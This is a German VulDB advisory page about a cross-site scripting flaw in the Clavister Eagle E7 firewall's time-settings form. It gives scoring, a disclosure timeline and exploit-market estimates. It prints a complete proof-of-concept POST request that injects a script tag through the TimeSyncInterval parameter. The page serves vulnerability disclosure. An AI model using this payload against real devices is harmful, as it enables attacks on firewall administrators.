| CVSS Meta Temp Score | Aktueller Exploitpreis (≈) | CTI Interest Score |
|---|---|---|
| 3.4 | $0-$5k | 0.00 |
Zusammenfassung
Eine Schwachstelle wurde in Clavister Eagle E7 ausgemacht. Sie wurde als problematisch eingestuft. Dabei geht es um eine nicht genauer bekannte Funktion der Datei /?Page=Node/OBJ=/System/DeviceFolder/DeviceFolder/DateTime/Action=Submit. Dank Manipulation mit unbekannten Daten kann eine Cross Site Scripting-Schwachstelle ausgenutzt werden. Der Angriff lässt sich über das Netzwerk starten. Zusätzlich gibt es einen verfügbaren Exploit.
Details
Es wurde eine Schwachstelle in Clavister Eagle E7 - die betroffene Version ist unbekannt - (Firewall Software) gefunden. Sie wurde als problematisch eingestuft. Dabei betrifft es ein unbekannter Prozess der Datei /?Page=Node/OBJ=/System/DeviceFolder/DeviceFolder/DateTime/Action=Submit. Mittels dem Manipulieren mit einer unbekannten Eingabe kann eine Cross Site Scripting-Schwachstelle ausgenutzt werden. Im Rahmen von CWE wurde eine Klassifizierung als CWE-80 vorgenommen. Dies wirkt sich aus auf die Integrität.
Am 05.08.2014 wurde das Problem entdeckt. Die Schwachstelle wurde am 28.07.2015 durch Oliver Kunz und Marc Ruef von scip AG als sID 76818 in Form eines bestätigten Entrys (scip VulDB) publik gemacht. Auf scip.ch kann das Advisory eingesehen werden. Die Veröffentlichung geschah dabei in Koordination mit dem Hersteller. Sie gilt als leicht auszunutzen. Der Angriff kann über das Netzwerk erfolgen. Das Angehen einer einfachen Authentisierung ist erforderlich, um eine Ausnutzung anzugehen. Es wird vorausgesetzt, dass das Opfer eine spezifische Handlung vornimmt. Es sind sowohl technische Details als auch ein öffentlicher Exploit zur Schwachstelle bekannt. MITRE ATT&CK führt die Angriffstechnik T1059.007 für diese Schwachstelle.
Ein öffentlicher Exploit wurde durch Oliver Kunz in HTTP POST Request realisiert und vor und nicht erst nach dem Advisory veröffentlicht. Der Exploit kann von vuldb.com heruntergeladen werden. Er wird als funktional gehandelt. Insgesamt wurde die Schwachstelle mindestens 357 Tage als nicht öffentlicher Zero-Day gehandelt. Während dieser Zeit erzielte er wohl etwa $0-$5k auf dem Schwarzmarkt. Der durch den Exploit genutzte Code gestaltet sich wie folgt:
POST /?Page=Node&OBJ=/System/DeviceFolder/DeviceFolder/DateTime&Action=Submit HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/?Page=Node&OBJ=/System/DeviceFolder/DeviceFolder/DateTime
Cookie: ID=2340081123
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 342
TimeZone=3600&DSTEnabled=on&DSTOffset=60&DSTStartMonth=3&DSTStartDay=1&DSTEndMonth=10&DSTEndDay=1&TimeSyncEnable=on&TimeSyncServerType=SNTP&TimeSyncServer1=dns%3Antp.clavister.com&TimeSyncServer2=&TimeSyncServer3=&TimeSyncInterval=86400"><script>alert("scip");</script>&TimeSyncMaxAdjust=600&TimeSyncGroupIntervalSize=10&btnOK=OKEs ist zwar eine neue Firmware vorhanden, wobei die Release Notes jedoch keinen Aufschluss darüber geben, ob diese Mängel zwischenzeitlich behoben wurden. Ein direktes Nachfragen beim Hersteller hat keine weiteren Details zu Tage gefördert, da man diese Information aus Sicherheitsgründen nicht herausgeben möchte.
Die Schwachstellen VDB-76819 sind ähnlich. If you want to get best quality of vulnerability data, you may have to visit VulDB.
Produkt
Typ
Hersteller
Name
CPE 2.3
CPE 2.2
Screenshot
CVSSv4
VulDB Vector: 🔍VulDB Zuverlässigkeit: 🔍
CVSSv3
VulDB Meta Base Score: 3.5VulDB Meta Temp Score: 3.4
VulDB Base Score: 3.5
VulDB Temp Score: 3.4
VulDB Vector: 🔍
VulDB Zuverlässigkeit: 🔍
CVSSv2
| AV | AC | Au | C | I | A |
|---|---|---|---|---|---|
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| Vektor | Komplexität | Authentisierung | Vertraulichkeit | Integrität | Verfügbarkeit |
|---|---|---|---|---|---|
| freischalten | freischalten | freischalten | freischalten | freischalten | freischalten |
| freischalten | freischalten | freischalten | freischalten | freischalten | freischalten |
| freischalten | freischalten | freischalten | freischalten | freischalten | freischalten |
VulDB Base Score: 🔍
VulDB Temp Score: 🔍
VulDB Zuverlässigkeit: 🔍
Exploiting
Klasse: Cross Site ScriptingCWE: CWE-80 / CWE-74 / CWE-707
CAPEC: 🔍
ATT&CK: 🔍
Physisch: Nein
Lokal: Nein
Remote: Ja
Verfügbarkeit: 🔍
Zugang: öffentlich
Status: Funktional
Autor: Oliver Kunz
Programmiersprache: 🔍
Download: 🔍
Preisentwicklung: 🔍
Aktuelle Preisschätzung: 🔍
| 0-Day | freischalten | freischalten | freischalten | freischalten |
|---|---|---|---|---|
| Heute | freischalten | freischalten | freischalten | freischalten |
Threat Intelligence
Interesse: 🔍Aktive Akteure: 🔍
Aktive APT Gruppen: 🔍
Gegenmassnahmen
Empfehlung: keine Massnahme bekanntStatus: 🔍
0-Day Time: 🔍
Timeline
05.08.2014 🔍05.08.2014 🔍
28.07.2015 🔍
28.07.2015 🔍
08.10.2018 🔍
Quellen
Advisory: sID 76818Person: Oliver Kunz, Marc Ruef
Firma: scip AG
Status: Bestätigt
Koordiniert: 🔍
GCVE (VulDB): GCVE-100-76818
scip Labs: https://www.scip.ch/?labs.20161013
Siehe auch: 🔍
Eintrag
Erstellt: 28.07.2015 14:45Aktualisierung: 08.10.2018 15:09
Anpassungen: 28.07.2015 14:45 (55), 08.10.2018 15:09 (2)
Komplett: 🔍
Cache ID: 216:39F:103
If you want to get best quality of vulnerability data, you may have to visit VulDB.
Bisher keine Kommentare. Sprachen: de + en.
Bitte loggen Sie sich ein, um kommentieren zu können.